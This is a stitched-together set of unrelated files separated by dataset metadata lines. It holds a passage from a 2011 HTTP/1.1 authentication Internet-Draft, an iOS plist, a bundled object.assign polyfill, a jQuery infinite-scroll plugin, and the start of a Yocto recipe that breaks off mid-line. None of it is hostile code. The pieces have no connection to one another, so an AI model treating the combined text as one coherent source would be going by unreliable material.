/ #auth-param )
The protection space determines the domain over which credentials can
be automatically applied. If a prior request has been authorized,
the same credentials MAY be reused for all other requests within that
protection space for a period of time determined by the
authentication scheme, parameters, and/or user preference. Unless
otherwise defined by the authentication scheme, a single protection
space cannot extend outside the scope of its server.
If the origin server does not wish to accept the credentials sent
with a request, it SHOULD return a 401 (Unauthorized) response. The
response MUST include a WWW-Authenticate header field containing at
least one (possibly new) challenge applicable to the requested
resource. If a proxy does not accept the credentials sent with a
request, it SHOULD return a 407 (Proxy Authentication Required). The
response MUST include a Proxy-Authenticate header field containing a
(possibly new) challenge applicable to the proxy for the requested
resource.
The HTTP protocol does not restrict applications to this simple
challenge-response mechanism for access authentication. Additional
Fielding, et al. Expires October 20, 2011 [Page 6]
Internet-Draft HTTP/1.1, Part 7 April 2011
mechanisms MAY be used, such as encryption at the transport level or
via message encapsulation, and with additional header fields
specifying authentication information. However, such additional
mechanisms are not defined by this specification.
Proxies MUST forward the WWW-Authenticate and Authorization headers
unmodified and follow the rules found in Section 4.1.
2.1. Authentication Scheme Registry
The HTTP Authentication Scheme Registry defines the name space for
the authentication schemes in challenges and credentials.
Registrations MUST include the following fields:
o Authentication Scheme Name
o Pointer to specification text
Values to be added to this name space are subject to IETF review
([RFC5226], Section 4.1).
The registry itself is maintained at
<http://www.iana.org/assignments/http-authschemes>.
3. Status Code Definitions
3.1. 401 Unauthorized
The request requires user authentication. The response MUST include
a WWW-Authenticate header field (Section 4.4) containing a challenge
applicable to the target resource. The client MAY repeat the request
with a suitable Authorization header field (Section 4.1). If the
request already included Authorization credentials, then the 401
response indicates that authorization has been refused for those
credentials. If the 401 response contains the same challenge as the
prior response, and the user agent has already attempted
authentication at least once, then the user SHOULD be presented the
representation that was given in the response, since that
representation might include relevant diagnostic information.
3.2. 407 Proxy Authentication Required
This code is similar to 401 (Unauthorized), but indicates that the
client ought to first authenticate itself with the proxy. The proxy
MUST return a Proxy-Authenticate header field (Section 4.2)
containing a challenge applicable to the proxy for the target
resource. The client MAY repeat the request with a suitable Proxy-
Fielding, et al. Expires October 20, 2011 [Page 7]
Internet-Draft HTTP/1.1, Part 7 April 2011
Authorization header field (Section 4.3).
4. Header Field Definitions
This section defines the syntax and semantics of HTTP/1.1 header
fields related to authentication.
4.1. Authorization
The "Authorization" header field allows a user agent to authenticate
itself with a server -- usually, but not necessarily, after receiving
a 401 (Unauthorized) response. Its value consists of credentials
containing information of the user agent for the realm of the
resource being requested.
Authorization = credentials
If a request is authenticated and a realm specified, the same
credentials SHOULD be valid for all other requests within this realm
(assuming that the authentication scheme itself does not require
otherwise, such as credentials that vary according to a challenge
value or using synchronized clocks).
When a shared cache (see Section 1.2 of [Part6]) receives a request
containing an Authorization field, it MUST NOT return the
corresponding response as a reply to any other request, unless one of
the following specific exceptions holds:
1. If the response includes the "s-maxage" cache-control directive,
the cache MAY use that response in replying to a subsequent
request. But (if the specified maximum age has passed) a proxy
cache MUST first revalidate it with the origin server, using the
header fields from the new request to allow the origin server to
authenticate the new request. (This is the defined behavior for
s-maxage.) If the response includes "s-maxage=0", the proxy MUST
always revalidate it before re-using it.
2. If the response includes the "must-revalidate" cache-control
directive, the cache MAY use that response in replying to a
subsequent request. But if the response is stale, all caches
MUST first revalidate it with the origin server, using the header
fields from the new request to allow the origin server to
authenticate the new request.
3. If the response includes the "public" cache-control directive, it
MAY be returned in reply to any subsequent request.
Fielding, et al. Expires October 20, 2011 [Page 8]
Internet-Draft HTTP/1.1, Part 7 April 2011
4.2. Proxy-Authenticate
The "Proxy-Authenticate" header field consists of a challenge that
indicates the authentication scheme and parameters applicable to the
proxy for this effective request URI (Section 4.3 of [Part1]). It
MUST be included as part of a 407 (Proxy Authentication Required)
response.
Proxy-Authenticate = 1#challenge
Unlike WWW-Authenticate, the Proxy-Authenticate header field applies
only to the current connection and SHOULD NOT be passed on to
downstream clients. However, an intermediate proxy might need to
obtain its own credentials by requesting them from the downstream
client, which in some circumstances will appear as if the proxy is
forwarding the Proxy-Authenticate header field.
4.3. Proxy-Authorization
The "Proxy-Authorization" header field allows the client to identify
itself (or its user) to a proxy which requires authentication. Its
value consists of credentials containing the authentication
information of the user agent for the proxy and/or realm of the
resource being requested.
Proxy-Authorization = credentials
Unlike Authorization, the Proxy-Authorization header field applies
only to the next outbound proxy that demanded authentication using
the Proxy-Authenticate field. When multiple proxies are used in a
chain, the Proxy-Authorization header field is consumed by the first
outbound proxy that was expecting to receive credentials. A proxy
MAY relay the credentials from the client request to the next proxy
if that is the mechanism by which the proxies cooperatively
authenticate a given request.
4.4. WWW-Authenticate
The "WWW-Authenticate" header field consists of at least one
challenge that indicates the authentication scheme(s) and parameters
applicable to the effective request URI (Section 4.3 of [Part1]). It
MUST be included in 401 (Unauthorized) response messages.
WWW-Authenticate = 1#challenge
User agents are advised to take special care in parsing the WWW-
Authenticate field value as it might contain more than one challenge,
or if more than one WWW-Authenticate header field is provided, the
Fielding, et al. Expires October 20, 2011 [Page 9]
Internet-Draft HTTP/1.1, Part 7 April 2011
contents of a challenge itself can contain a comma-separated list of
authentication parameters.
5. IANA Considerations
5.1. Authenticaton Scheme Registry
The registration procedure for HTTP Authentication Schemes is defined
by Section 2.1 of this document.
The HTTP Method Authentication Scheme shall be created at
<http://www.iana.org/assignments/http-authschemes>.
5.2. Status Code Registration
The HTTP Status Code Registry located at
<http://www.iana.org/assignments/http-status-codes> shall be updated
with the registrations below:
+-------+-------------------------------+-------------+
| Value | Description | Reference |
+-------+-------------------------------+-------------+
| 401 | Unauthorized | Section 3.1 |
| 407 | Proxy Authentication Required | Section 3.2 |
+-------+-------------------------------+-------------+
5.3. Header Field Registration
The Message Header Field Registry located at <http://www.iana.org/
assignments/message-headers/message-header-index.html> shall be
updated with the permanent registrations below (see [RFC3864]):
+---------------------+----------+----------+-------------+
| Header Field Name | Protocol | Status | Reference |
+---------------------+----------+----------+-------------+
| Authorization | http | standard | Section 4.1 |
| Proxy-Authenticate | http | standard | Section 4.2 |
| Proxy-Authorization | http | standard | Section 4.3 |
| WWW-Authenticate | http | standard | Section 4.4 |
+---------------------+----------+----------+-------------+
The change controller is: "IETF ([email protected]) - Internet
Engineering Task Force".
6. Security Considerations
This section is meant to inform application developers, information
providers, and users of the security limitations in HTTP/1.1 as
Fielding, et al. Expires October 20, 2011 [Page 10]
Internet-Draft HTTP/1.1, Part 7 April 2011
described by this document. The discussion does not include
definitive solutions to the problems revealed, though it does make
some suggestions for reducing security risks.
6.1. Authentication Credentials and Idle Clients
Existing HTTP clients and user agents typically retain authentication
information indefinitely. HTTP/1.1 does not provide a method for a
server to direct clients to discard these cached credentials. This
is a significant defect that requires further extensions to HTTP.
Circumstances under which credential caching can interfere with the
application's security model include but are not limited to:
o Clients which have been idle for an extended period following
which the server might wish to cause the client to reprompt the
user for credentials.
o Applications which include a session termination indication (such
as a "logout" or "commit" button on a page) after which the server
side of the application "knows" that there is no further reason
for the client to retain the credentials.
This is currently under separate study. There are a number of work-
arounds to parts of this problem, and we encourage the use of
password protection in screen savers, idle time-outs, and other
methods which mitigate the security problems inherent in this
problem. In particular, user agents which cache credentials are
encouraged to provide a readily accessible mechanism for discarding
cached credentials under user control.
7. Acknowledgments
This specification takes over the definition of the HTTP
Authentication Framework, previously defined in RFC 2617. We thank
to John Franks, Phillip M. Hallam-Baker, Jeffery L. Hostetler, Scott
D. Lawrence, Paul J. Leach, Ari Luotonen, and Lawrence C. Stewart for
their work on that specification.
[[acks: HTTPbis acknowledgements.]]
8. References
8.1. Normative References
[Part1] Fielding, R., Ed., Gettys, J., Mogul, J., Frystyk, H.,
Masinter, L., Leach, P., Berners-Lee, T., Lafon, Y., Ed.,
and J. Reschke, Ed., "HTTP/1.1, part 1: URIs, Connections,
and Message Parsing", draft-ietf-httpbis-p1-messaging-14
Fielding, et al. Expires October 20, 2011 [Page 11]
Internet-Draft HTTP/1.1, Part 7 April 2011
(work in progress), April 2011.
[Part6] Fielding, R., Ed., Gettys, J., Mogul, J., Frystyk, H.,
Masinter, L., Leach, P., Berners-Lee, T., Lafon, Y., Ed.,
Nottingham, M., Ed., and J. Reschke, Ed., "HTTP/1.1, part
6: Caching", draft-ietf-httpbis-p6-cache-14 (work in
progress), April 2011.
[RFC2119] Bradner, S., "Key words for use in RFCs to Indicate
Requirement Levels", BCP 14, RFC 2119, March 1997.
[RFC5234] Crocker, D., Ed. and P. Overell, "Augmented BNF for Syntax
Specifications: ABNF", STD 68, RFC 5234, January 2008.
8.2. Informative References
[RFC2616] Fielding, R., Gettys, J., Mogul, J., Frystyk, H.,
Masinter, L., Leach, P., and T. Berners-Lee, "Hypertext
Transfer Protocol -- HTTP/1.1", RFC 2616, June 1999.
[RFC2617] Franks, J., Hallam-Baker, P., Hostetler, J., Lawrence, S.,
Leach, P., Luotonen, A., and L. Stewart, "HTTP
Authentication: Basic and Digest Access Authentication",
RFC 2617, June 1999.
[RFC3864] Klyne, G., Nottingham, M., and J. Mogul, "Registration
Procedures for Message Header Fields", BCP 90, RFC 3864,
September 2004.
[RFC5226] Narten, T. and H. Alvestrand, "Guidelines for Writing an
IANA Considerations Section in RFCs", BCP 26, RFC 5226,
May 2008.
Appendix A. Changes from RFC 2616
Change ABNF productions for header fields to only define the field
value. (Section 4)
Fielding, et al. Expires October 20, 2011 [Page 12]
Internet-Draft HTTP/1.1, Part 7 April 2011
Appendix B. Collected ABNF
Authorization = credentials
OWS = <OWS, defined in [Part1], Section 1.2.2>
Proxy-Authenticate = *( "," OWS ) challenge *( OWS "," [ OWS
challenge ] )
Proxy-Authorization = credentials
WWW-Authenticate = *( "," OWS ) challenge *( OWS "," [ OWS challenge
] )
auth-param = token "=" ( token / quoted-string )
auth-scheme = token
challenge = auth-scheme 1*SP *( "," OWS ) auth-param *( OWS "," [ OWS
auth-param ] )
credentials = auth-scheme ( token / quoted-string / [ ( "," /
auth-param ) *( OWS "," [ OWS auth-param ] ) ] )
quoted-string = <quoted-string, defined in [Part1], Section 1.2.2>
realm = "realm=" realm-value
realm-value = quoted-string
token = <token, defined in [Part1], Section 1.2.2>
ABNF diagnostics:
; Authorization defined but not used
; Proxy-Authenticate defined but not used
; Proxy-Authorization defined but not used
; WWW-Authenticate defined but not used
; realm defined but not used
Appendix C. Change Log (to be removed by RFC Editor before publication)
C.1. Since RFC 2616
Extracted relevant partitions from [RFC2616].
C.2. Since draft-ietf-httpbis-p7-auth-00
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/35>: "Normative and
Informative references"
Fielding, et al. Expires October 20, 2011 [Page 13]
Internet-Draft HTTP/1.1, Part 7 April 2011
C.3. Since draft-ietf-httpbis-p7-auth-01
Ongoing work on ABNF conversion
(<http://tools.ietf.org/wg/httpbis/trac/ticket/36>):
o Explicitly import BNF rules for "challenge" and "credentials" from
RFC2617.
o Add explicit references to BNF syntax and rules imported from
other parts of the specification.
C.4. Since draft-ietf-httpbis-p7-auth-02
Ongoing work on IANA Message Header Field Registration
(<http://tools.ietf.org/wg/httpbis/trac/ticket/40>):
o Reference RFC 3984, and update header field registrations for
header fields defined in this document.
C.5. Since draft-ietf-httpbis-p7-auth-03
C.6. Since draft-ietf-httpbis-p7-auth-04
Ongoing work on ABNF conversion
(<http://tools.ietf.org/wg/httpbis/trac/ticket/36>):
o Use "/" instead of "|" for alternatives.
o Introduce new ABNF rules for "bad" whitespace ("BWS"), optional
whitespace ("OWS") and required whitespace ("RWS").
o Rewrite ABNFs to spell out whitespace rules, factor out header
field value format definitions.
C.7. Since draft-ietf-httpbis-p7-auth-05
Final work on ABNF conversion
(<http://tools.ietf.org/wg/httpbis/trac/ticket/36>):
o Add appendix containing collected and expanded ABNF, reorganize
ABNF introduction.
C.8. Since draft-ietf-httpbis-p7-auth-06
None.
Fielding, et al. Expires October 20, 2011 [Page 14]
Internet-Draft HTTP/1.1, Part 7 April 2011
C.9. Since draft-ietf-httpbis-p7-auth-07
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/198>: "move IANA
registrations for optional status codes"
C.10. Since draft-ietf-httpbis-p7-auth-08
No significant changes.
C.11. Since draft-ietf-httpbis-p7-auth-09
Partly resolved issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/196>: "Term for the
requested resource's URI"
C.12. Since draft-ietf-httpbis-p7-auth-10
None yet.
C.13. Since draft-ietf-httpbis-p7-auth-11
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/130>: "introduction
to part 7 is work-in-progress"
o <http://tools.ietf.org/wg/httpbis/trac/ticket/195>: "auth-param
syntax"
o <http://tools.ietf.org/wg/httpbis/trac/ticket/224>: "Header
Classification"
o <http://tools.ietf.org/wg/httpbis/trac/ticket/237>: "absorbing the
auth framework from 2617"
Partly resolved issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/141>: "should we
have an auth scheme registry"
C.14. Since draft-ietf-httpbis-p7-auth-12
None.
Fielding, et al. Expires October 20, 2011 [Page 15]
Internet-Draft HTTP/1.1, Part 7 April 2011
C.15. Since draft-ietf-httpbis-p7-auth-13
Closed issues:
o <http://tools.ietf.org/wg/httpbis/trac/ticket/276>: "untangle
ABNFs for header fields"
Index
4
401 Unauthorized (status code) 7
407 Proxy Authentication Required (status code) 7
A
auth-param 5
auth-scheme 5
Authorization header field 8
C
challenge 5
credentials 6
G
Grammar
Authorization 8
Proxy-Authenticate 9
Proxy-Authorization 9
WWW-Authenticate 9
H
Header Fields
Authorization 8
Proxy-Authenticate 9
Proxy-Authorization 9
WWW-Authenticate 9
P
Proxy-Authenticate header field 9
Proxy-Authorization header field 9
R
realm 5
realm-value 5
S
Status Codes
401 Unauthorized 7
407 Proxy Authentication Required 7
Fielding, et al. Expires October 20, 2011 [Page 16]
Internet-Draft HTTP/1.1, Part 7 April 2011
W
WWW-Authenticate header field 9
Authors' Addresses
Roy T. Fielding (editor)
Adobe Systems Incorporated
345 Park Ave
San Jose, CA 95110
USA
EMail: [email protected]
URI: http://roy.gbiv.com/
Jim Gettys
Alcatel-Lucent Bell Labs
21 Oak Knoll Road
Carlisle, MA 01741
USA
EMail: [email protected]
URI: http://gettys.wordpress.com/
Jeffrey C. Mogul
Hewlett-Packard Company
HP Labs, Large Scale Systems Group
1501 Page Mill Road, MS 1177
Palo Alto, CA 94304
USA
EMail: [email protected]
Henrik Frystyk Nielsen
Microsoft Corporation
1 Microsoft Way
Redmond, WA 98052
USA
EMail: [email protected]
Fielding, et al. Expires October 20, 2011 [Page 17]
Internet-Draft HTTP/1.1, Part 7 April 2011
Larry Masinter
Adobe Systems Incorporated
345 Park Ave
San Jose, CA 95110
USA
EMail: [email protected]
URI: http://larry.masinter.net/
Paul J. Leach
Microsoft Corporation
1 Microsoft Way
Redmond, WA 98052
EMail: [email protected]
Tim Berners-Lee
World Wide Web Consortium
MIT Computer Science and Artificial Intelligence Laboratory
The Stata Center, Building 32
32 Vassar Street
Cambridge, MA 02139
USA
EMail: [email protected]
URI: http://www.w3.org/People/Berners-Lee/
Yves Lafon (editor)
World Wide Web Consortium
W3C / ERCIM
2004, rte des Lucioles
Sophia-Antipolis, AM 06902
France
EMail: [email protected]
URI: http://www.raubacapeu.net/people/yves/
Fielding, et al. Expires October 20, 2011 [Page 18]
Internet-Draft HTTP/1.1, Part 7 April 2011
Julian F. Reschke (editor)
greenbytes GmbH
Hafenweg 16
Muenster, NW 48155
Germany
Phone: +49 251 2807760
Fax: +49 251 2807761
EMail: [email protected]
URI: http://greenbytes.de/tech/webdav/
Fielding, et al. Expires October 20, 2011 [Page 19]
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDisplayName</key>
<string>AnimateUIView</string>
<key>CFBundleIdentifier</key>
<string>com.your-company.AnimateUIView</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>LSRequiresIPhoneOS</key>
<true />
<key>MinimumOSVersion</key>
<string>9.0</string>
<key>UIDeviceFamily</key>
<array>
<integer>1</integer>
</array>
<key>UILaunchStoryboardName</key>
<string>LaunchScreen</string>
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
<key>UISupportedInterfaceOrientations</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
<string>UIInterfaceOrientationLandscapeLeft</string>
<string>UIInterfaceOrientationLandscapeRight</string>
</array>
<key>XSAppIconAssets</key>
<string>Resources/Images.xcassets/AppIcons.appiconset</string>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
(function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){
'use strict';
var keys = require('object-keys').shim();
delete keys.shim;
var assign = require('./');
module.exports = assign.shim();
delete assign.shim;
},{"./":3,"object-keys":9}],2:[function(require,module,exports){
'use strict';
// modified from https://github.com/es-shims/es6-shim
var keys = require('object-keys');
var bind = require('function-bind');
var canBeObject = function (obj) {
return typeof obj !== 'undefined' && obj !== null;
};
var hasSymbols = require('has-symbols/shams')();
var toObject = Object;
var push = bind.call(Function.call, Array.prototype.push);
var propIsEnumerable = bind.call(Function.call, Object.prototype.propertyIsEnumerable);
var originalGetSymbols = hasSymbols ? Object.getOwnPropertySymbols : null;
module.exports = function assign(target, source1) {
if (!canBeObject(target)) { throw new TypeError('target must be an object'); }
var objTarget = toObject(target);
var s, source, i, props, syms, value, key;
for (s = 1; s < arguments.length; ++s) {
source = toObject(arguments[s]);
props = keys(source);
var getSymbols = hasSymbols && (Object.getOwnPropertySymbols || originalGetSymbols);
if (getSymbols) {
syms = getSymbols(source);
for (i = 0; i < syms.length; ++i) {
key = syms[i];
if (propIsEnumerable(source, key)) {
push(props, key);
}
}
}
for (i = 0; i < props.length; ++i) {
key = props[i];
value = source[key];
if (propIsEnumerable(source, key)) {
objTarget[key] = value;
}
}
}
return objTarget;
};
},{"function-bind":7,"has-symbols/shams":8,"object-keys":9}],3:[function(require,module,exports){
'use strict';
var defineProperties = require('define-properties');
var implementation = require('./implementation');
var getPolyfill = require('./polyfill');
var shim = require('./shim');
var polyfill = getPolyfill();
defineProperties(polyfill, {
getPolyfill: getPolyfill,
implementation: implementation,
shim: shim
});
module.exports = polyfill;
},{"./implementation":2,"./polyfill":11,"./shim":12,"define-properties":4}],4:[function(require,module,exports){
'use strict';
var keys = require('object-keys');
var foreach = require('foreach');
var hasSymbols = typeof Symbol === 'function' && typeof Symbol() === 'symbol';
var toStr = Object.prototype.toString;
var isFunction = function (fn) {
return typeof fn === 'function' && toStr.call(fn) === '[object Function]';
};
var arePropertyDescriptorsSupported = function () {
var obj = {};
try {
Object.defineProperty(obj, 'x', { enumerable: false, value: obj });
/* eslint-disable no-unused-vars, no-restricted-syntax */
for (var _ in obj) { return false; }
/* eslint-enable no-unused-vars, no-restricted-syntax */
return obj.x === obj;
} catch (e) { /* this is IE 8. */
return false;
}
};
var supportsDescriptors = Object.defineProperty && arePropertyDescriptorsSupported();
var defineProperty = function (object, name, value, predicate) {
if (name in object && (!isFunction(predicate) || !predicate())) {
return;
}
if (supportsDescriptors) {
Object.defineProperty(object, name, {
configurable: true,
enumerable: false,
value: value,
writable: true
});
} else {
object[name] = value;
}
};
var defineProperties = function (object, map) {
var predicates = arguments.length > 2 ? arguments[2] : {};
var props = keys(map);
if (hasSymbols) {
props = props.concat(Object.getOwnPropertySymbols(map));
}
foreach(props, function (name) {
defineProperty(object, name, map[name], predicates[name]);
});
};
defineProperties.supportsDescriptors = !!supportsDescriptors;
module.exports = defineProperties;
},{"foreach":5,"object-keys":9}],5:[function(require,module,exports){
var hasOwn = Object.prototype.hasOwnProperty;
var toString = Object.prototype.toString;
module.exports = function forEach (obj, fn, ctx) {
if (toString.call(fn) !== '[object Function]') {
throw new TypeError('iterator must be a function');
}
var l = obj.length;
if (l === +l) {
for (var i = 0; i < l; i++) {
fn.call(ctx, obj[i], i, obj);
}
} else {
for (var k in obj) {
if (hasOwn.call(obj, k)) {
fn.call(ctx, obj[k], k, obj);
}
}
}
};
},{}],6:[function(require,module,exports){
'use strict';
/* eslint no-invalid-this: 1 */
var ERROR_MESSAGE = 'Function.prototype.bind called on incompatible ';
var slice = Array.prototype.slice;
var toStr = Object.prototype.toString;
var funcType = '[object Function]';
module.exports = function bind(that) {
var target = this;
if (typeof target !== 'function' || toStr.call(target) !== funcType) {
throw new TypeError(ERROR_MESSAGE + target);
}
var args = slice.call(arguments, 1);
var bound;
var binder = function () {
if (this instanceof bound) {
var result = target.apply(
this,
args.concat(slice.call(arguments))
);
if (Object(result) === result) {
return result;
}
return this;
} else {
return target.apply(
that,
args.concat(slice.call(arguments))
);
}
};
var boundLength = Math.max(0, target.length - args.length);
var boundArgs = [];
for (var i = 0; i < boundLength; i++) {
boundArgs.push('$' + i);
}
bound = Function('binder', 'return function (' + boundArgs.join(',') + '){ return binder.apply(this,arguments); }')(binder);
if (target.prototype) {
var Empty = function Empty() {};
Empty.prototype = target.prototype;
bound.prototype = new Empty();
Empty.prototype = null;
}
return bound;
};
},{}],7:[function(require,module,exports){
'use strict';
var implementation = require('./implementation');
module.exports = Function.prototype.bind || implementation;
},{"./implementation":6}],8:[function(require,module,exports){
'use strict';
/* eslint complexity: [2, 17], max-statements: [2, 33] */
module.exports = function hasSymbols() {
if (typeof Symbol !== 'function' || typeof Object.getOwnPropertySymbols !== 'function') { return false; }
if (typeof Symbol.iterator === 'symbol') { return true; }
var obj = {};
var sym = Symbol('test');
var symObj = Object(sym);
if (typeof sym === 'string') { return false; }
if (Object.prototype.toString.call(sym) !== '[object Symbol]') { return false; }
if (Object.prototype.toString.call(symObj) !== '[object Symbol]') { return false; }
// temp disabled per https://github.com/ljharb/object.assign/issues/17
// if (sym instanceof Symbol) { return false; }
// temp disabled per https://github.com/WebReflection/get-own-property-symbols/issues/4
// if (!(symObj instanceof Symbol)) { return false; }
// if (typeof Symbol.prototype.toString !== 'function') { return false; }
// if (String(sym) !== Symbol.prototype.toString.call(sym)) { return false; }
var symVal = 42;
obj[sym] = symVal;
for (sym in obj) { return false; } // eslint-disable-line no-restricted-syntax
if (typeof Object.keys === 'function' && Object.keys(obj).length !== 0) { return false; }
if (typeof Object.getOwnPropertyNames === 'function' && Object.getOwnPropertyNames(obj).length !== 0) { return false; }
var syms = Object.getOwnPropertySymbols(obj);
if (syms.length !== 1 || syms[0] !== sym) { return false; }
if (!Object.prototype.propertyIsEnumerable.call(obj, sym)) { return false; }
if (typeof Object.getOwnPropertyDescriptor === 'function') {
var descriptor = Object.getOwnPropertyDescriptor(obj, sym);
if (descriptor.value !== symVal || descriptor.enumerable !== true) { return false; }
}
return true;
};
},{}],9:[function(require,module,exports){
'use strict';
// modified from https://github.com/es-shims/es5-shim
var has = Object.prototype.hasOwnProperty;
var toStr = Object.prototype.toString;
var slice = Array.prototype.slice;
var isArgs = require('./isArguments');
var isEnumerable = Object.prototype.propertyIsEnumerable;
var hasDontEnumBug = !isEnumerable.call({ toString: null }, 'toString');
var hasProtoEnumBug = isEnumerable.call(function () {}, 'prototype');
var dontEnums = [
'toString',
'toLocaleString',
'valueOf',
'hasOwnProperty',
'isPrototypeOf',
'propertyIsEnumerable',
'constructor'
];
var equalsConstructorPrototype = function (o) {
var ctor = o.constructor;
return ctor && ctor.prototype === o;
};
var excludedKeys = {
$console: true,
$external: true,
$frame: true,
$frameElement: true,
$frames: true,
$innerHeight: true,
$innerWidth: true,
$outerHeight: true,
$outerWidth: true,
$pageXOffset: true,
$pageYOffset: true,
$parent: true,
$scrollLeft: true,
$scrollTop: true,
$scrollX: true,
$scrollY: true,
$self: true,
$webkitIndexedDB: true,
$webkitStorageInfo: true,
$window: true
};
var hasAutomationEqualityBug = (function () {
/* global window */
if (typeof window === 'undefined') { return false; }
for (var k in window) {
try {
if (!excludedKeys['$' + k] && has.call(window, k) && window[k] !== null && typeof window[k] === 'object') {
try {
equalsConstructorPrototype(window[k]);
} catch (e) {
return true;
}
}
} catch (e) {
return true;
}
}
return false;
}());
var equalsConstructorPrototypeIfNotBuggy = function (o) {
/* global window */
if (typeof window === 'undefined' || !hasAutomationEqualityBug) {
return equalsConstructorPrototype(o);
}
try {
return equalsConstructorPrototype(o);
} catch (e) {
return false;
}
};
var keysShim = function keys(object) {
var isObject = object !== null && typeof object === 'object';
var isFunction = toStr.call(object) === '[object Function]';
var isArguments = isArgs(object);
var isString = isObject && toStr.call(object) === '[object String]';
var theKeys = [];
if (!isObject && !isFunction && !isArguments) {
throw new TypeError('Object.keys called on a non-object');
}
var skipProto = hasProtoEnumBug && isFunction;
if (isString && object.length > 0 && !has.call(object, 0)) {
for (var i = 0; i < object.length; ++i) {
theKeys.push(String(i));
}
}
if (isArguments && object.length > 0) {
for (var j = 0; j < object.length; ++j) {
theKeys.push(String(j));
}
} else {
for (var name in object) {
if (!(skipProto && name === 'prototype') && has.call(object, name)) {
theKeys.push(String(name));
}
}
}
if (hasDontEnumBug) {
var skipConstructor = equalsConstructorPrototypeIfNotBuggy(object);
for (var k = 0; k < dontEnums.length; ++k) {
if (!(skipConstructor && dontEnums[k] === 'constructor') && has.call(object, dontEnums[k])) {
theKeys.push(dontEnums[k]);
}
}
}
return theKeys;
};
keysShim.shim = function shimObjectKeys() {
if (Object.keys) {
var keysWorksWithArguments = (function () {
// Safari 5.0 bug
return (Object.keys(arguments) || '').length === 2;
}(1, 2));
if (!keysWorksWithArguments) {
var originalKeys = Object.keys;
Object.keys = function keys(object) {
if (isArgs(object)) {
return originalKeys(slice.call(object));
} else {
return originalKeys(object);
}
};
}
} else {
Object.keys = keysShim;
}
return Object.keys || keysShim;
};
module.exports = keysShim;
},{"./isArguments":10}],10:[function(require,module,exports){
'use strict';
var toStr = Object.prototype.toString;
module.exports = function isArguments(value) {
var str = toStr.call(value);
var isArgs = str === '[object Arguments]';
if (!isArgs) {
isArgs = str !== '[object Array]' &&
value !== null &&
typeof value === 'object' &&
typeof value.length === 'number' &&
value.length >= 0 &&
toStr.call(value.callee) === '[object Function]';
}
return isArgs;
};
},{}],11:[function(require,module,exports){
'use strict';
var implementation = require('./implementation');
var lacksProperEnumerationOrder = function () {
if (!Object.assign) {
return false;
}
// v8, specifically in node 4.x, has a bug with incorrect property enumeration order
// note: this does not detect the bug unless there's 20 characters
var str = 'abcdefghijklmnopqrst';
var letters = str.split('');
var map = {};
for (var i = 0; i < letters.length; ++i) {
map[letters[i]] = letters[i];
}
var obj = Object.assign({}, map);
var actual = '';
for (var k in obj) {
actual += k;
}
return str !== actual;
};
var assignHasPendingExceptions = function () {
if (!Object.assign || !Object.preventExtensions) {
return false;
}
// Firefox 37 still has "pending exception" logic in its Object.assign implementation,
// which is 72% slower than our shim, and Firefox 40's native implementation.
var thrower = Object.preventExtensions({ 1: 2 });
try {
Object.assign(thrower, 'xy');
} catch (e) {
return thrower[1] === 'y';
}
return false;
};
module.exports = function getPolyfill() {
if (!Object.assign) {
return implementation;
}
if (lacksProperEnumerationOrder()) {
return implementation;
}
if (assignHasPendingExceptions()) {
return implementation;
}
return Object.assign;
};
},{"./implementation":2}],12:[function(require,module,exports){
'use strict';
var define = require('define-properties');
var getPolyfill = require('./polyfill');
module.exports = function shimAssign() {
var polyfill = getPolyfill();
define(
Object,
{ assign: polyfill },
{ assign: function () { return Object.assign !== polyfill; } }
);
return polyfill;
};
},{"./polyfill":11,"define-properties":4}]},{},[1]);
| {
"pile_set_name": "Github"
} |
/*
--------------------------------
Infinite Scroll Behavior
Manual / Twitter-style
--------------------------------
+ https://github.com/paulirish/infinitescroll/
+ version 2.0b2.110617
+ Copyright 2011 Paul Irish & Luke Shumard
+ Licensed under the MIT license
+ Documentation: http://infinite-scroll.com/
*/
(function ($, undefined) {
$.extend($.infinitescroll.prototype, {
_setup_twitter: function infscr_setup_twitter() {
var opts = this.options,
instance = this;
$(opts.nextSelector).click(function (e) {
if (e.which == 1 && !e.metaKey && !e.shiftKey) {
e.preventDefault();
instance.retrieve();
}
});
instance.options.loading.start = function (opts) {
//console.log(opts);
$(opts.navSelector).addClass("isLoading");
instance.beginAjax(opts);
};
instance.options.loading.finished = function (opts) {
//$(opts.navSelector).removeClass("isLoading");
};
},
_showdonemsg_twitter: function infscr_showdonemsg_twitter() {
var opts = this.options,
instance = this;
//And also hide the navSelector
//$(opts.navSelector).fadeOut('normal');
// user provided callback when done
opts.errorCallback.call($(opts.contentSelector)[0], 'done');
}
});
})(jQuery);
| {
"pile_set_name": "Github"
} |
# Generated by superflore -- DO NOT EDIT
#
# Copyright Open Source Robotics Foundation
inherit ros_distro_melodic
inherit ros_superflore_generated
DESCRIPTION = "RTAB-Map's standalone library. RTAB-Map is a RGB-D SLAM approach with real-time constraints."
AUTHOR = "Mathieu Labbe <[email protected]>"
ROS_AUTHOR = "Mathieu Labbe"
HOMEPAGE = "http://introlab.github.io/rtabmap"
SECTION = "devel"
LICENSE = "BSD"
LIC_FILES_CHKSUM = "file://package.xml;beginline=8;endline=8;md5=d566ef916e9dedc494f5f793a6690ba5"
ROS_CN = "rtabmap"
ROS_BPN = "rtabmap"
ROS_BUILD_DEPENDS = " \
